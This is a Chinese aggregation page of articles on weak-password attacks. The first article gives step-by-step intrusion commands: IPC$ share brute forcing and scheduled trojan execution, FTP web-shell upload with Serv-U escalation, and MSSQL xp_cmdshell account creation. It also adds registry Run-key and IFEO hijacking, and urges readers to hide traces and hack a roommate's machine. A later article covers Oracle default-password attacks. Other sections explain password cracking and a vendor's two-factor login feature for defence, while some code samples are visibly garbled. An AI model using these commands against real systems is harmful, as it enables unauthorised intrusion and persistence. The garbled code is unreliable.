精华内容
下载资源
问答
  • 共享弱口令攻击
    万次阅读
    2015-12-30 17:14:28

    一、什么是弱口令

      就是说由常用数字、字母、字符等组合成的,容易被别人通过简单及平常的思维方式就能猜到的密码,利用弱口令结合计算机系统等漏洞可以做到入侵的事半功倍的效果

     

    二、共享入侵--IPC$

        IPC$是共享“命名管道”资源,它是为了让进程间通信而开放的命令管道,可以通过验证用户名和密码获取相应的权限,在远程管理计算机和查看计算机的共享资源是使用,利用IPC$,攻击者甚至可以与目标主机建立一个空的连接而无需用户名和密码,前提是对方开启了IPC$共享。

    1、如何利用iPC$入侵

     第一步,利用空连接得到目标主机上的用户列表,使用命令,例如:net use \\192.168.1.200\ipc$"/user:"" 建立连接,

        第二步,采用爆破方法扫描得到用户名和密码 ,其实就是net use z:\\192.168.1.200\c$,不断的暴力尝试

        第三步,得到用户名和密码后 登录对方电脑,net use \\192.168.1.200\ipc$ "test" /user:administrator,net use z:\\192.168.1.203\ipc$

        第四步,打开我的电脑发现多了一个z盘,其实就是目标机的c盘内容了

        第五步,上传木马后门,exe文件或者bat文件都可以,就是复制粘贴就行了

       第六步,执行木马后门,利用at命令设定时间运行该程序,先net time \\192.168.1.203命令查看系统时间,而后领用at命令at \\192.168.1.203 21:05 c:\test.bat,就可以让目标机在预定时间只用木马,而后沦为肉鸡。

    2、IPC$入侵注意事项

        第一,不要把\写成了/

        第二,在建立空连接的时候,引号的输入应在英文状态下输入

    3、如何防范IPC$入侵

         第一,cmd下输入命令:net share 看看自己的机器开了多少共享

        第二,再用net share 共享名/del删除共享

        第三,最彻底的办法就是禁用IPC$服务,命令为:net stop server,而后输入y即可

       以上就是IPC$入侵的大致过程,不妨自己虚拟机环境下自己动手运行一下,或者黑一下室友的机子。。。。。。。。。。。

     

    三、目录浏览

        目录浏览是基于web服务的,也就是说如果web服务配置不当,就可以导致攻击者浏览web目录下的任意文件和目录。如IIS、apache、tomcat等web服务器都有可能存在这样的问题。

     

    四、暴库

        暴库,就是通过一些技术手段或者程序漏洞得到数据库的地址,并将数据非法下载到本地。这里要了解两个概念:相对路径(如D:/text/text.txt)和绝对路径(如:/text/text.txt)。

    暴库有两个方法来实现,第一个就是利用%5c,另外一个就是conn.asp暴库。

        1、%5c暴库

        简单的说就是在打开网页时,将/换成%5c,然后提交就可以得到数据库地址了,但必须是需要调用数据库的页面,比如登录等,

        原因:

         这和IIS的解析有关,%5c是\的十六进制代码,也就是\的另一种表达方式,我们在提交网页时,IE会自动把%5c转换成/,从而得到同一地址,可是ISS并不这样认为,应为来了一个%5c(也就是/),虽然IE解析的时候是一个意思,可在ISS这里却认为访问到\这里就到了根目录所在的地方,而不再往上解析了。

    2、con.asp 暴库

        同%5c的方法一样,%5c是利用绝对路径出错,而con.asp是利用相对路径出错。

        例如,conn.sap代码:

        <%

    db="kerally database/kenerldatabase.mdb"

    constr="DB!"+server.mappath(do)+"DefaultDir=DRIVER{Microsoft Acess Driver(*mb)|.Pwd=kenanel"

    set com=server.createObject("ADODB ,Connection"

    con.open.coratr

    Sub.rsclose()

         rs.Close()

    set rs=nothing

    End sub

    sub.conclose()

    conn.close()

    set conn=nothing

    End sub

    %>

    第一句中,调用数据库相对路径是”kenatlybdatabase/kenandatabase.mdb"..conn.asp文件一般是起调用数据库作用的,如果调用文件和conn.asp文件的相对位置发生变化了,那么就会出现暴库。

    3、暴库的防范

    (1)及时更新发现过的漏洞,也就是把IIS升级到最新版本

    (2)在conn.asp暴库中,限制文件暴库,也就是让他不暴库继续执行,加入一些代码即可

    五、弱口令攻击

         弱口令,设计到电脑的各种口令设置简单的后果,比如FTP、SSH灯各种服务,抑或管理平台的口令,都可能被攻击者不费任何力气获得,从而导致服务器的沦陷。

    下面就把一些常用的基于大众的弱口令方法描写出来。

    1、FTP弱口令

         FTP(FILE TRANSFER Protocol)是文件传输协议的简称,用于Internet上传文件的双向传输。同时,它也是一个应用程序,用户可以通过它把自己的PC机与各地的所有运行FTP协议的服务器相连,访问服务器上的大量信息。

         例如,我们可以利用FTP读取、上传、删除、创建文件或者程序,如果得到了一个权限很大的FTP账号,后果是比较严重的,现在比较流行的还有SerV-u工具。

        第一步,连接ftp服务器,方式:ftp 服务器IP地址

        第二部,使用hscan工具扫描开始IP和结束IP,也可以挑选要扫描的IP,这里我们输入目的ftp服务器IP

        第三部,扫描结束后,如果对方是弱口令,我们将得到连接ftp服务器的用户名和密码

        第四步,如果对方使用的是Serv-u,可以直接加一个系统账户,命令为:quote site exec net user guest /avtive:yes(这一句的作用是把系统内置账户guest激活),如果serv-u没有权限执行命令的话,我们就要换一种思路了

        第五步,既然无法直接添加系统用户,可以先使用dir命令看一下有什么文件,如果查看到admin、upload这样目录,还有index.htm,这里就要注意啦,很可能一个web目录,此时我们可以穿一个后门asp脚本就可能得到一个shell.

       第六步,找到思路后,我们要先知道后门被传到哪里了,也就是说我们要能通过url连接到我们的后门地址,先把它的index下载到本地看一下里面是什么内容,命令为:

    get index.htm c:\index.htm,就是把index.htm文件下载到本机c盘里面。

         第七步,根据内容找到服务器的URL,这个主要通过社工,如百度等

         第八步,直接通过ftp上传一个asp脚本木马上去,命令为:put F:\web木马\asp马\dama.asp。

         第九步,接着打开http://www.xx.com/dama.asp,输入后门密码,这个shell自带serv-u提权功能,点击serv-u提权,然后添加用户即可。

         第十步,占领3389端口,mstsc 输入用户名和密码,这样就成功占领服务器的桌面了。

         注意:

         第一,得到ftp密码后如果不能直接利用,不要死盯一点,一般ftp服务的都会有web服务,应该把目光放大一点,充分利用资源

         第二,就是要利用尽可能多的方法来收集对方的信息

         第三,隐藏自己的入侵痕迹,你懂得。

    2、基于MSSQL弱口令的入侵

         MSSQL其实是一个关系数据库管理系统,是Microsoft推出的新一代数据管理与分析软件,它是一个全面的、集成的、端到端的数据解决方案,为企业中的用户提供了一个安全,可靠和高效的平台,用于企业数据管理和商业智能应用,所以适合一些大型网站的使用

         如何利用已知用户名和密码的情况下拿到服务器权限

    相关知识:

         1、 在SQL server中,主要有两种角色类型:服务器角色与数据库角色,攻击者在攻击时,会遇到三种角色:sa权限、db_owner权限和public权限

          (1)sa权限

             是system和Admin的缩写,为MSSQL数据库的默认系统账号,具有最高权限,第一次安装MSSQL时,如果sa密码过于简单,攻击者很可能用hscan或者x-scan等暴力破解工具通过字典爆破的方式得到用户名和密码,然后再通过sql连接器灯工具连到1433端口(MSSQL默认端口),利用扩展存储执行系统命令。

         (2)Db_owner权限:

          其中db是database的缩写,owner是拥有者的意思。从字面上我们就可以猜出db_owner是指某个数据库的拥有者,它拥有对数据库的修改、删除等大部分存储过程的权限,但是涉及到系统敏感操作时,它是没有权限的,如前面提到的xp_cmdshell等

         (3)public权限

         public的权限相对较小,不过还是有可以利用到的地方比如目录、建立临时表等。

         第一步,假如我们已经扫描到一台拥有弱口令的机器,用户名是sa,口令为admin,我们首先通过sqltools.exe连接上去试一下,不然就试一下MSSQL连接器.exe,或者sql查询分析器分离版本连接。

        第二步,执行exec xp_cmdshell ‘net user test test /add'、exec xp_cmdshell、net localgroup adminis-trators text /add'命令成功添加具有管理员权限的用户

        第三步,假如管理员做了手脚,把xp_cmdshell这个存储过程删了,或者关闭了

        开启xp_cmdshell:

        EXEC sp__configure 'show advanced options',1,RECONFIGURE;:EXEC sp_configre 'xp_configure' 1 RECONFIGLRE;

        恢复xp_cmdshell:

        EXEC sp_addexiendeproc xp_cmdshell @dllname='xplog70.dll

       第四步,操作注册表提权主要有两种思路,一种就是利用注册表启动项,执行以下代码

    exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','Software\microsoft\windows\currentversion\policies\explorer\run','running','REG_SZ','c:\windows\system32\cmd.exe /c net user 1st 1st /add'

         这样只要等待服务器重启就会运行代码,从而添加一个用户名和密码都为1st的用户。既然能操作注册表了,我们就可以用镜像劫持之类的技术来达到不需要重启就可以直接占领3389的目的。

        第五步,了解镜像劫持,利用其渗透

        镜像劫持(IFEO)就是image file exeution options,它位于注册表HKEY_LOCAL_MACHINE\SOFTWRE\Microsoft\Windows NT\CurrentVersion\CurrentVersion\Image File Executions,最关键的是,这个键值下有一个Debugger参数,“调试器",它是IFEO里被第一个被处理的参数,其作用如下:

        系统如果发现某个程序文件在IFEO列表中,它就会首先来读取 Debugger参数,如果该参数不为空,系统就会把Debugger参数里指定的程序文件名作为用户尝试启动的程序执行请求来处理。其本身目的是双击程序文件就进入调试,但是黑客如果换成cmd.exe或者exploer.exe就可以直接执行系统命令了,代码如下

       exec master.dbo.xp-regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\Micosoft\\Windows NT\\CurentVersion\\Image File Exection\\setc.exe','debugger','REG_SZ','C:\\windows\\exploer.exe'

        第六步,进入桌面程序 添加登录账号。

    3.基于MySql弱口令的入侵 4 基于oracle弱口令的入侵 5。tomcat弱口令的入侵  6、第三方管理工具radmin和vnc弱口令入侵

      

     

     

     

     

     

     

     

    更多相关内容
  • 弱口令介绍及破解方式

    千次阅读 2022-04-02 16:44:12
    一、弱口令的定义 仅包含简单数字和字母的口令,例如“123”、“abc”等,因为这样的口令很容易被别人破解,从而使用户的计算机面临风险,因此不推荐用户使用。 二、弱口令的特点 1、连续字符串(如aaaa,abc等)...

    一、弱口令的定义

    仅包含简单数字和字母的口令,例如“123”、“abc”等,因为这样的口令很容易被别人破解,从而使用户的计算机面临风险,因此不推荐用户使用。

    二、弱口令的特点

    1、连续字符串(如aaaa,abc等)

    2、数字

    数字通常会包含个人信息,如生日、身份证号的某几位。

    3、字符串+数字;数字+字符串;重复数字或字符串的组合

    三、安全口令的要求(有效防止弱口令)

    1.不使用空口令或系统缺省的口令,因为这些口令众所周知,为典型的弱口令。

    2.口令长度不小于8个字符。

    3.口令不应该为连续的某个字符(例如:AAAAAAAA)或重复某些字符的组合(例如:tzf.tzf.)。

    4.口令应该为以下四类字符的组合,大写字母(A-Z)、小写字母(a-z)、数字(0-9)和特殊字符。每类字符至少包含一个。如果某类字符只包含一个,那么该字符不应为首字符或尾字符。

    5.口令中不应包含本人、父母、子女和配偶的姓名和出生日期、纪念日期、登录名、E-mail地址等等与本人有关的信息,以及字典中的单词。

    6.口令不应该为用数字或符号代替某些字母的单词。

    7.口令应该易记且可以快速输入,防止他人从你身后很容易看到你的输入。

    8.至少90天内更换一次口令,防止未被发现的入侵者继续使用该口令。

    四、暴力破解

    1、定义

    暴力破解,是一种针对于密码的破译方法,将密码进行逐个推算直到找出真正的密码为止。例如一个已知是四位并且全部由数字组成的密码,其可能共有10000种组合,因此最多尝试10000次就能找到正确的密码。而当遇到人为设置密码(非随机密码,人为设置密码有规律可循)的场景,则可以使用密码字典(例如彩虹表)查找高频密码,破解时间大大缩短。

    2、暴力破解的方法

    1)穷举法

    穷举法是指根据输入密码的设定长度、选定的字符集生成可能的密码全集,进行地毯式搜索。例如一个已知是四位并且全部由数字组成的密码,其可能共有10000种组合,因此最多尝试10000次就能找到正确的密码。理论上利用这种方法可以破解任何一种密码,但随着密码复杂度增加,破解密码的时间会指数级延长。

    穷举法适用于猜解随机生成的短信验证码等,因为各种随机生成密码出现的概率是一样的,不受人的记忆影响。

    2)字典式攻击

    字典式攻击是将出现频率最高的密码保存到文件中,这文件就是字典,暴破时使用字典中的这些密码去猜解。

    字典式攻击适用于猜解人为设定的口令,因为人为设定受人方便记忆影响不同密码出现的概率是不一样的,12345678、password作为密码的概率比fghtsaer作为密码的概率要高得多。与穷举法相比,字典式攻击虽然损失了较小的命中率但节省了较多的时间。

    3)彩虹表攻击

    彩虹表攻击也属于字典式攻击,但它是一种高效地破解哈希算法(MD5、SHA1、SHA256/512等)的攻击方式。

    网站为了增加安全性,不会直接将用户密码存储在数据库中,而是将密码进行哈希,变成一长串毫无意义的字符,并且哈希算法是不可逆的,没有解密算法可以还原成原来的密码。面对哈希后的密码,破解的方法有两个,一是用穷举法组合出所有的密码可能,然后经哈希加密算法计算,将结果与目标哈希值进行比对,但边计算边比对会耗费海量的时间;二是提前生成可能密码与对应哈希串的对照表,但是对照表将占据海量的磁盘空间,以14位字母和数字的组合密码为例,生成的密码32位哈希串的对照表将占用5.7×10^14 TB的存储空间。

    彩虹表是时间空间折中的方法,其核心思想是将明文计算得到的哈希值由R函数映射回明文空间,交替计算明文和哈希值,生成哈希链,将这个链的首尾存储在表中,中间的都删掉,用的时候临时算,那么存储的空间比原来的减少了一半,而计算次数也并没有大量增多。由于在哈希链的计算过程中引入不同的R函数,将不同的R函数用不同的颜色表示,众多的哈希链就会像彩虹一样,所以叫做彩虹表。

    使用彩虹表进行破解,普通PC也能达到每秒1000亿次以上的惊人速度。为了增加安全性,可能会多次哈希,例如MD5后再MD5一次;或者在原始密码前后补上一串字符,增加密码长度后再哈希,学名叫加盐(salt),这些算法的结果都可以加入彩虹表中。最完善的彩虹表差不多能破解出目前网上99.9%的密码。

    五、容易被暴力破解的口令

    许多人设置的密码都过于简单,或者使用电话号码、出生日期、亲人或宠物的名字作为密码,或者在不同网站使用相同密码,这些行为导致密码很容易被破解。

    在 2020 年末,NordPass 公布了 2020 年使用率最高的 200 个密码,排名靠前的几个密码分别为 123456、123456789、password、12345678、111111、123123、12345、1234567890、1234567、000000、1234 …… ,除了纯数字,还有各种数字和字母组合,例如:qwerty、abc123 和 picture1 等。

    暴力破解不会造成直接的入侵,但攻击者通过暴力破解获得了系统/用户的账号和密码,以此为后续的入侵做准备。对于个人而言,直接从用户那里窃取金钱,或者窃取其身份,身份盗用可能导致进一步的财务损失。对于企业而言,通过暴力破解可以登录Telnet服务、POP3服务和MySQL服务等,登录成功将会导致用户信息泄露、文件共享、邮件泄露或无法正常发送邮件等高危事件。

    六、如何防止用户的密码被暴力破解

    1、应用层面

    • 对登录设置账户锁定。例:在连续输入错误的密码之后,需要间隔一段时间才能输入下一次密码。
    • 对登录的设备进行识别,如果是受信任的设备可通过,如果是新设备需要进行用户认证。

    2、用户层面

    • 使用复杂度较高的密码,如包含大小写字母、数字、特殊字符。
    • 定期修改密码。

    七、总结

    对于弱口令的破解,穷举法对于简单的口令有着“奇效”,但是对于一般的口令,穷举法的工作量太大;字典式攻击,弱口令字典可以存储相关弱口令,相较于穷举法损失了一些命中率(缺),节省了存储空间(优);彩虹表攻击,是针对破解使用哈希算法加密的口令破解法,成本非常高。

    展开全文
  • 开启该功能后,通过登录中心时进行二次验证的方式,阻止中心遭遇密码泄露、弱口令暴破、撞库等黑客破解行为带来的危害,达到保护火绒控制中心的目的。适用用户及场景:1)、中心连接外部互联网的企业。2)、中心登录...

    功能描述:

    火绒企业版可以分别对火绒控制中心和火绒客户端启用动态口令功能,这里分别阐述:

    1、火绒企业版针对火绒控制中心(以下简称中心)的防护新增“动态口令”功能。

    开启该功能后,通过登录中心时进行二次验证的方式,阻止中心遭遇密码泄露、弱口令暴破、撞库等黑客破解行为带来的危害,达到保护火绒控制中心的目的。

    适用用户及场景:

    1)、中心连接外部互联网的企业。

    2)、中心登录密码较为简单,且不方便定期修改的企业。

    2、火绒企业版可以针对企业用户终端的防护新增“动态认证”功能。

    开启后,通过登录终端时(包括远程和本地登录)进行二次验证的方式,阻止终端遭遇密码泄露、弱口令暴破、撞库等黑客破解行为带来的危害,达到保护终端安全目的。

    适用用户及场景:

    1、终端登录密码强度较弱、复用率高,且不方便定期修改的企业用户。

    2、终端暴露在外网环境中的企业。

    3、具有远程需求的、经常开启远程端口的企业用户。

    支持系统:

    该功能目前支持Windows Vista及以上版本。对Windows XP、Windows Server 2003、Linux等版本暂不支持。

    功能使用方法:

    1、准备工作。获取接受二次验证口令的工具(“火绒口令”微信小程序)。

    注:小程序获取和详细操作见下方。

    2、功能使用

    开启控制中心“动态口令”功能

    第一步,登录中心

    点击【账号管理】,点击【设置】。勾选【开启动态口令】,点击【确定】。

    bcac9bba11b75f0cc8de50e086784ff8.png

    第二步,获取动态口令。 先获取口令二维码,在【账号管理】页面,点击【动态口令】按钮。然后使用“火绒口令”小程序扫描该二维码即可。

    1456f4cde108851daafd1ec58d463cfc.png

    (1)超级管理员的口令二维码在首次开启功能时,会自行弹出,请及时保存。(2)如需再次查看二维码,或查看其他管理员二维码,可点击本页面对应的【动态口令】按钮获取。注:(1)二维码目前由超级管理员单独发送至其他管理员(右键点击二维码保存图片即可),且必须与管理员账号对应,交叉使用无效。

    202478c2e2346efbcb7c0c54c355ede2.png

    (2)、超级管理员可重置账号的动态口令二维码。重置后对应的动态口令失效。

    da6fac692b913ab2929cb34837a26d0d.png

    第三步,登录。 上述步骤设置完成后,可通过中心ip地址再次登录进行测试:输入中心的账号密码后,再按照提示输入对应账号的动态口令。

    e87ab023dc5705ecd43c019e284577a5.png

    注:(1)登录失败五次后将锁定登录页面15分钟。登录失败次数=账号或密码错误次数+动态口令错误次数;(2)该功能开启后,只对非本地(使用中心ip地址)登录中心的方式生效,本地登录( localhost)无需二次验证。

    其它注意事项: 1、中心所在的终端显示时间需与生成口令的移动设备时间一致,否则口令无效。2、中心默认开启自动登出设定。如想避免系统自行频繁登出输入口令,可以在中心【账号管理】-【设置】中,修改“自动登出设置”至适宜长短时间。

    f651e54cb51f17b089b872ab18ae1370.png

    3、如果勾选中心登录界面的“下次自动登录”,则默认关闭“自动登出设置”,只需首次登录时输入账号、密码以及动态口令即可。

    2c32d1d9dda43dd6c5f9a907b35ed949.png

    4、该功能(包括中心所在终端、“火绒口令”微信小程序所在移动端)断网状态下仍旧可以有效使用。

    开启终端“动态口令”认证功能

    第一步,开启功能。

    登录中心,点击【防护策略】-【终端动态认证】。点击“添加”按钮,可以通过分组检索与模糊搜索,来添加需要开启该功能的终端。

    88d06c42f6e910f0a2a841f999eebcc5.png

    然后,根据需求来选择功能的应用范围,包括“远程登录时启用”与“本地登录时启用”。功能默认只勾选“远程登录时启用”,如果有修改,需等待30秒同步至终端后生效。

    注:该功能开启后将只支持通过账号密码登录,不能使用指纹、PIN码等方式登录。

    2d6454b4224cbcf5cbc4f5408e63b890.png

    第二步,获取终端动态口令。

    首先,管理员点击“动态口令”按钮,获取口令二维码。然后将二维码发送至终端用户,用户使用“火绒口令”小程序扫描该二维码即可。

    b466663cd97d0935bb6388936df34545.png

    注:

    (1)二维码与终端机器对应,交叉使用无效。

    (2)管理员可重置终端的动态口令二维码。重置后对应的动态口令失效。

    第三步,登录。

    当开启火绒“终端动态认证”功能后,无论是本地还是远程登录用户计算机时,都将弹出火绒的动态口令安全认证窗口。若用户设置了计算机密码,则该弹窗将在用户输入正确的账户密码后弹出;如果用户未设置计算机密码,则该弹窗开机直接弹出。用户需再次输入正确的动态口令才可登录计算机。

    76f5a591e7c7117ff1f22c8a2bca88a2.png

    微信小程序操作及注意事项:

    (1)获取微信小程序:扫描下方小程序码或在微信小程序内搜索“huorong authenticator”。

    09c8bcb328979f1387021a21b2f845ec.png

    (2)点击下方“+”按钮扫描动态口令二维码,即可获取对应账号的登录口令。

    96cbe50c3ba553fd288a37ecc0e9e0c9.png

    (3)点击笔状按钮可编辑、删除口令。

    1bd48f3029d9d358a340242509e7d1d2.png

    (4)动态口令每隔30秒刷新一次。

    (5)请确保输入的动态口令与中心账号对应。

    5bd2c12fc6fdcdc2e8a5225fff28c9ce.png
    展开全文
  • oracle弱口令攻击

    2019-04-18 11:48:00
    oracle弱口令攻击 0x00 oracle数据库简介 oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点: 一、支持大数据库、多用户的高性能的...

    oracle弱口令攻击

     

     

    0x00 oracle数据库简介


    oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点:

    一、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库,其大小可到>几百千兆,可充分利用硬件设备。支持大量用户同时在

    同一数据上执行各种数据应用,并使数据争用最小,保证数据一致性。系统维护具有高>的性能,Oracle每天可连续24小时工作,正常的系统操作

    (后备或个别计算机系统故障)不会中断数据库的使用。可控制数据库数据的可用性,可在数据库级或在子数据库级上控制。

    二、Oracle遵守数据存取语言、操作系统、用户接口和网络通信协议的工业标准。所以>它是一个开放系统,保护了用户的投资。美国标准化和技术

    研究所(NIST)对Oracle7 SERVER进行检验,100%地与ANSI/ISO SQL89标准的二级相>兼容。

    三、实施安全性控制和完整性控制。Oracle为限制各监控数据存取提供系统可靠的安全>性。Oracle实施数据完整性,为可接受的数据指定标准。

    四、支持分布式数据库和分布处理。Oracle为了充分利用计算机系统和网络,允许将处理分为数据库服务器和客户应用程序,所有共享的数据管理 由数据库管理系统的计算机处理,而运行数据库应用的工作站集中于解释和显示数据。通过网络连接的计算机环境,Oracle将存放在多台计算机上的 数据组合成一个逻辑数据库,可被全部网络用户存取。分布式系统像集中式数据库一样具有透明性和数据一致性。 具有可移植性、可兼容性和可连接性。由于Oracle软件可在许多不同的操作系统上运 行,以致Oracle上所开发的应用 可移植到任何操作系统,只需很少修改或不需修改。Oracle软件同工业标准相兼容,包括很多工业标准的操作系统, 所开发应用系统可在任何操作系统上运行。可连接性是指ORALCE允许不同类型的计算机和操作系统通过网络可共享信息。

     


    虽然Oracle数据库具有很高的安全性,但是如果我们在配置的时候不注意安全意识,那么也是很危险的。也就是说,安全最主要的还是要靠人自己,而不能过分依赖软件来实现。


     

     

    我们知道,在 mssql中,安装完成后默认有个sa的登陆密码为空,如果不更改就会产生安全漏洞。那么 oracle呢?也有的。

    为了安装和调试的方便,Oracle数据库中的两个具有 DBA权限的用户 SysSystem的缺省密码是 manager

    笔者发现很多国内网站的Oracle数据库没有更改这两个用户的密码,其中也包括很多大型的电子商务网站, 我们就可以利用


    进行测试前我们先来了解一些相关的知识,我们连接一个 Oracle数据库的时候,需要知道它的 service_name或者是 Sid值,就象 mssql一样,需要知道数据库名。那如何去知道呢,猜?呵呵,显然是不行的。这里我们先讲讲 oracleTNS listener它位于数据库 Client和数据库 Server之间,默认监听1521端口,这个监听端口是可以更改的。但是如果你用一个tcp的session去连接1521端口的话,oracle将不会返回它的banner,如果你输入一些东西的话,它甚至有可能把你踢出去。这里我们就需要用 tnscmd.pl这个 perl程序了,它可以查询远程oracle数据库是否开启(也就是ping了),查询版本,以及查询它的服务

    名,服务状态和数据库服务名,而且正确率很高。


     

     

     

    0x01 oracle弱口令攻击


    理论方面的讲完了,如果还有什么不懂的可以去查找相关资料。现在开始测试吧,需要的工具有: ActivePerlOracle客户端Superscan或者是 其它扫描端口的软件Tnscmd.pl

    我们先用 Superscan扫描开放了端口1521的主机,假设其IP是 xx.xx.110.110,这样目标已经有了。然后我们要做的就是用Tnscmd.pl 来查询远程数据库的服务名了,Tnscmd.pl的用法如下:

     

    C:perlbin>perl tnscmd.pl
    usage: tnscmd.pl [command] -h hostname
    where 'command' is something like ping, version, status, etc.
    (default is ping)
    [-p port] - alternate TCP port to use (default is 1521)
    [--logfile logfile] - write raw packets to specified logfile
    [--indent] - indent & outdent on parens
    [--rawcmd command] - build your own CONNECT_DATA string
    [--cmdsize bytes] - fake TNS command size (reveals packet leakage)

     

     

     

    我们下面用的只有简单的几个命令,其他的命令也很好用,一起去发掘吧。

    然后我们就这样来:

     

    C:perlbin>perl tnscmd.pl services -h xx.xx.110.110 -p 1521 –indent
    sending (CONNECT_DATA=(COMMAND=services)) to xx.xx.110.110:1521
    writing 91 bytes
    reading
    ._.......6.........?. ..........
    DESCRIPTION=
    TMP=
    VSNNUM=135286784
    ERR=0
    SERVICES_EXIST=1
    .Q........
    SERVICE=
    SERVICE_NAME=ORCL
    INSTANCE=
    INSTANCE_NAME=ORCL
    NUM=1
    INSTANCE_CLASS=ORACLE
    HANDLER=
    HANDLER_DISPLAY=DEDICATED SERVER
    STA=ready
    HANDLER_INFO=LOCAL SERVER
    HANDLER_MAXLOAD=0
    HANDLER_LOAD=0
    ESTABLISHED=447278
    REFUSED=0
    HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227
    HANDLER_NAME=DEDICATED
    ADDRESS=
    PROTOCOL=beq
    PROGRAM=/home/oracle/bin/oracle
    ENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL'
    ARGV0=oracleORCL
    ARGS='
    LOCAL=NO
    '
    .........@  

     

    从上面得到的信息我们可以看出数据库的服务名为ORCL,然后我们就可以通过 sqlplus工具来远程连上它了,

    用户名和密码我们用默认的 system/manager或者是 sys/manager,其他的如 mdsys/mdsysctxsys/ctxsys等,

    这个默认用户和密码是随版本的不同而改变的。如下:

     

    1. C:oracleora90BIN>sqlplus /nolog
    2. SQL*Plus: Release 9.0.1.0.1 - Production on Thu May 23 11:36:59 2002
    3. (c) Copyright 2001 oracle Corporation. All rights reserved.
    4. SQL>connect system/manager@
    5. (description=(address_list=(address=(protocol=tcp)
    6. (host=xx.xx.110.110)(port=1521)))
    7. (connect_data=(SERVICE_NAME=ORCL)));

    如果密码正确,那么就会提示 connected,如果不行,再换别的默认用户名和密码。经过笔者的尝试一般用 dbsnmp/dbsnmp都能进去。当然如果对方已经把默认密码改了,那我们只能换别的目标了。但是我发现很多都是不改的,这个就是安全意识的问题了。


     

     

    0x02 上面提到的两个小软件:

    tnscmd.pl

    1. 代码: tnscmd.pl

    用链表实现的oracle密码暴破程序

    1. 代码: 用链表实现的oracle密码暴破程序

     

     

    0x03 利用弱口令进行入侵:

    #
    C:\>sqlplus /nolog
    SQL> connect system/manager@(description=(address_list=(address=(protocol=tcp)(host=www.xx.com)
    (port=1521)))(connect_data=(SERVICE_NAME=ora9i)));

     

    然后利用 OracleExecuteCommandSqlScript来执行系统命令

    转载于:https://www.cnblogs.com/-qing-/p/10728713.html

    展开全文
  • 渗透测试——SSH弱口令暴破0x02

    万次阅读 多人点赞 2018-09-04 20:42:09
    本文由Tahir所写,转载请注明出处:... 【信息收集】 一、测试对象 攻击机:kali-linux-2017.3-vm-amd64 IP:10.10.10.130 靶机:OWASP Broken Web Apps v0.94 IP:10.10.10.129 二、测试工具 ...
  • 针对口令认证系统中用户频繁重复使用同一弱口令的问题,提出一种基于服务器与便携移动设备间秘密共享的单一口令认证方法,允许远程用户使用单一口令和多个在线服务进行安全认证,且客户端PC无需存储用户的任何秘密...
  • 1、概述 2、系统弱口令检测 七、namp命令 总结 引言 在我们日常生活中,大家都会为我们各种账号设置密码,那我们为什么要设置密码呢?显然我们是为了安全,在我们linux 中也需要为类似的安全保护,来保证我们的数据...
  • 终端及登录控制2.1 禁止 root 用户登录2.2 禁止普通用户登录二、弱口令检测与端口扫描1.弱口令检测——John the Ripper1.1 下载并且安装 John the Ripper1.2 检测弱口令账号1.3 使用密码字典文件2.网络扫描——NMAP1...
  • 弱口令审计-工具用法大全

    千次阅读 2020-09-11 18:44:55
    目前,帐号仍然是最主要的用户身份认证方式,但由于安全意识的淡漠,很多人仍在使用弱口令。而一旦泄漏,所有安全防范机制都将形同虚设。 本课程《用户口令审计》是『Kali Linux工具大全』技术系列的第5部分。向大家...
  • 弱口令扫描 弱口令扫描,例如对于mysql,vnc,rdp,http管理登录等弱口令进入的服务,可以使用一些弱口令扫描工具,xscan,hydra,medusa,nmap等。也可以自己找到更多更好的工具 hydra 1.先用nmap扫描开发了哪些...
  • Oracle 10g弱口令攻击

    千次阅读 2011-10-20 14:24:16
    既然是弱口令,我就直接用PL/SQL Developer(Oracle数据开发软件,网上多的是)连接上他电脑的Oracle服务。 连接上他电脑的Oracle了,就新建SQL窗口……然后: 第一步: 创建Java Sources文件用于执行cmd,学过...
  • 因为Radmin的控制功能非常强大,传输速度也比大多数木马快,而且又不被杀毒软件所查杀,所用Radmin管理远程电脑时使用的是空口令或者是弱口令,黑客就可以使用一些软件扫描网络上存在Radmin空口令或者弱口令的主机,...
  • 7.Windows口令扫描及3389口令暴力破解

    千次阅读 2021-01-02 14:52:28
    在Windows操作系统渗透过程中,除了SQL注入、Web服务漏洞攻击等方式外,还有一种攻击方式,即暴力破解,对3389或者内网的服务器进行口令扫描攻击,以获取更多的服务器权限。这种攻击尤其是在拥有一台或者多台服务器...
  • 看我如何在赛门铁克邮件安全网关上实现弱口令到RCE漏洞执行 ...
  • 1.为什么受攻击 1.1什么是暴力破解攻 暴力破解攻击是指攻击者通过系统地组合并尝试所有的可能性以破解用户的用户名、密码等敏感信息。攻击者往往借助自动化脚本工具来发动暴力破解攻击。 1.1.1攻击行为类型 根据暴力...
  • 2、对诸如admin、123456等的弱口令进行暴力破解。 实话实说,第二种办法相当奏效。实际使用的密码为Passw0rd,大写的P,数字0。这个密码是我手动试出来的,因为大多数IT员工在设置账户密码时需要包含至少1位大写...
  • 常用的端口攻击

    千次阅读 2021-07-21 11:18:10
    Jetty 默认端口:8080 攻击方式: 远程共享缓冲区溢出 Lotus 影响的都是一些大型的企业,特别需要注意,经过以前的测试发现弱口令这个问题经常都存在,可能是很多管理员不知道如何去修改(不要打我)。 默认端口:...
  • 网络攻击技术

    千次阅读 2021-06-05 10:45:55
    一、网络攻击概述 1. 网络攻击的目标: 网络攻击的目标主要有系统和数据两类,其所对应的安全性也涉及系统安全和数据安全两个方面。 系统型攻击的特点:攻击发生在网络层,破坏系统的可用性,使系统不能正常工作。可 ...
  • 1.Webshell攻击 威胁级别:高 原理:Webshell攻击就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器...
  • 口令扫描攻击有两种方式 一种是不知道用户名称,猜测性暴力攻击 另一种是通过各种工具或手段收集用户信息,利用收集的信息实施攻击 口令扫描获取用户的账号名称方法 利用网络工具获取: 可以利用目标主机的...
